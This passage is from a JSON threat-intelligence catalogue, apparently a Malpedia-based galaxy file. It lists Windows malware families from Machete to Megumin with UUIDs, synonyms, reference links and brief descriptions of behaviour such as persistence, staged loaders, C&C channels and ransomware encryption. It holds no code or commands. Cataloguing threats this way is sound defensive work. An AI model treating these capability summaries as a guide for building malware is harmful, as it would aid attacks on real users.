strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", "https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf", "https://securelist.com/el-machete/66108/", "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6", "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html", "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/" ], "synonyms": [ "El Machete" ], "type": [] }, "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", "value": "Machete" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax" ], "synonyms": [], "type": [] }, "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", "value": "MadMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" ], "synonyms": [], "type": [] }, "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", "value": "Magala" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372", "https://www.youtube.com/watch?v=lqWJaaofNf4", "http://asec.ahnlab.com/1124", "https://asec.ahnlab.com/en/19273/" ], "synonyms": [], "type": [] }, "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", "value": "Magniber" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto", "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/", "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/", "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/", "https://www.youtube.com/watch?v=q8of74upT_g", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/", "https://www.ic3.gov/media/news/2020/200929-2.pdf", "https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://lopqto.me/posts/automated-dynamic-import-resolving", "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/", "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware", "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware", "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/", "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf", "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/", "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware", "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million", "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/", "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html", "https://zero2auto.com/2020/05/19/netwalker-re/", "https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/", "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download", "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", "https://zengo.com/bitcoin-ransomware-detective-ucsf/" ], "synonyms": [ "Koko Ransomware", "NetWalker" ], "type": [] }, "uuid": "722aab64-a02a-40fc-8c05-6b0344fad9b8", "value": "Mailto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/", "https://www.cyber.nj.gov/threat-profiles/pos-malware-variants/majikpos" ], "synonyms": [], "type": [] }, "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", "value": "MajikPos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" ], "synonyms": [], "type": [] }, "uuid": "996e73e9-b093-4987-9992-f52008e55b24", "value": "Makadocs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", "https://twitter.com/James_inthe_box/status/1046844087469391872" ], "synonyms": [], "type": [] }, "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", "value": "MakLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", "https://twitter.com/siri_urz/status/1221797493849018368" ], "synonyms": [], "type": [] }, "uuid": "db4ca498-5481-4b68-8024-edd51d552c38", "value": "Makop Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/", "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" ], "synonyms": [], "type": [] }, "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", "value": "Maktub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" ], "synonyms": [], "type": [] }, "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", "value": "MalumPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", "https://securelist.com/the-return-of-mamba-ransomware/79403/", "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", "https://www.youtube.com/watch?v=LUxOcpIRxmg" ], "synonyms": [ "DiskCryptor", "HDDCryptor" ], "type": [] }, "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", "value": "Mamba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" ], "synonyms": [ "CryptoHost" ], "type": [] }, "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", "value": "ManameCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf" ], "synonyms": [ "junidor", "mengkite", "vedratve" ], "type": [] }, "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", "value": "Mangzamel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", "https://twitter.com/struppigel/status/811587154983981056" ], "synonyms": [], "type": [] }, "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", "value": "Manifestus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", "value": "ManItsMe" }, { "description": "Ransomware family closely related to GlobeImposter, notable for its use of SHACAL-2 encryption algorithm.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa", "https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "9fe92a48-6822-4ec0-b52b-d089f98590ec", "value": "Maoloa" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", "value": "MAPIget" }, { "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" ], "synonyms": [], "type": [] }, "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", "value": "Marap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa", "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/", "https://www.us-cert.gov/ics/advisories/ICSA-10-090-01", "https://defintel.com/docs/Mariposa_Analysis.pdf" ], "synonyms": [ "Autorun", "Palevo", "Rimecud" ], "type": [] }, "uuid": "6adb6fa0-1974-4d24-9c39-e76d5356cf6a", "value": "Mariposa" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.masad_stealer", "https://blogs.juniper.net/en-us/threat-research/masad-stealer-exfiltrating-using-telegram" ], "synonyms": [], "type": [] }, "uuid": "8a85df9f-5295-4570-948a-67c2489bdd2d", "value": "Masad Stealer" }, { "description": "MassLogger is a .NET credential stealer. It starts with a launcher that uses simple anti-debugging techniques which can be easily bypassed when identified. This first stage loader eventually XOR-decrypts the second stage assembly which then decrypts, loads and executes the final MassLogger payload.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger", "https://fr3d.hk/blog/masslogger-frankenstein-s-creation", "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7", "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html", "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/", "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/", "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger", "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/", "https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html", "https://twitter.com/pancak3lullz/status/1255893734241304576" ], "synonyms": [], "type": [] }, "uuid": "e1a09bf8-974a-4cc4-9ffd-758bed7a785e", "value": "MASS Logger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" ], "synonyms": [], "type": [] }, "uuid": "59717468-271e-4d15-859a-130681c17ddb", "value": "Matrix Banker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware" ], "synonyms": [], "type": [] }, "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", "value": "Matrix Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", "http://www.clearskysec.com/tulip/", "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" ], "synonyms": [], "type": [] }, "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", "value": "Matryoshka RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" ], "synonyms": [], "type": [] }, "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", "value": "Matsnu" }, { "description": "Specialized PoisonIvy Sideloader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf", "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html" ], "synonyms": [], "type": [] }, "uuid": "feb5ac55-7b28-47aa-9e9e-5007d838c0d5", "value": "Maudi" }, { "description": "Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.\r\n\r\nActors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout). \r\n\r\nThe code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.secureworks.com/research/threat-profiles/gold-village", "https://www.docdroid.net/dUpPY5s/maze.pdf", "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/", "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/", "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U", "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat", "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/", "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", "https://securelist.com/maze-ransomware/99137/", "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/", "https://oag.ca.gov/system/files/Letter%204.pdf", "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html", "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/", "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf", "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f", "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/", "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/", "https://securelist.com/targeted-ransomware-encrypting-data/99255/", "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://twitter.com/certbund/status/1192756294307995655", "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" ], "synonyms": [ "ChaCha" ], "type": [] }, "uuid": "266c9377-34ef-4670-afa3-28bc0ba7f44e", "value": "Maze" }, { "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html", "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d" ], "synonyms": [ "DexLocker" ], "type": [] }, "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", "value": "MBRlock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker", "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html" ], "synonyms": [], "type": [] }, "uuid": "1f7fc94c-218a-4571-85b6-5667544bf230", "value": "MBR Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", "https://www.symantec.com/connect/blogs/bios-threat-showing-again", "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/", "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/" ], "synonyms": [ "MyBios" ], "type": [] }, "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", "value": "Mebromi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" ], "synonyms": [ "GoldStamp" ], "type": [] }, "uuid": "cd055701-89ad-41be-b4d9-69460876fdee", "value": "MECHANICAL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" ], "synonyms": [], "type": [] }, "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", "value": "Medre" }, { "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", "https://news.drweb.com/show/?i=10302&lng=en" ], "synonyms": [], "type": [] }, "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", "value": "Medusa (Windows)" }, { "description": "A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker", "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html", "https://blog.talosintelligence.com/2020/04/medusalocker.html", "https://www.cybereason.com/blog/medusalocker-ransomware", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html", "https://twitter.com/siri_urz/status/1215194488714346496?s=20", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/" ], "synonyms": [ "AKO Doxware", "AKO Ransomware", "MedusaReborn" ], "type": [] }, "uuid": "77e7221f-d3db-4d13-bcde-e6d7a494f424", "value": "MedusaLocker" }, { "description": "Megacortex is a ransomware used in targeted attacks against corporations.\r\nOnce the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is used to be carried from downloaders and trojans, it has no own propagation capabilities.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://blog.malwarebytes.com/detections/ransom-megacortex/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/", "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/", "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/", "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/", "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [], "type": [] }, "uuid": "3f09884e-dddc-4513-8720-a28fe21ab9a8", "value": "MegaCortex" }, { "description": "Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin", "https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/" ], "synonyms": [], "type": [] }, "uuid": 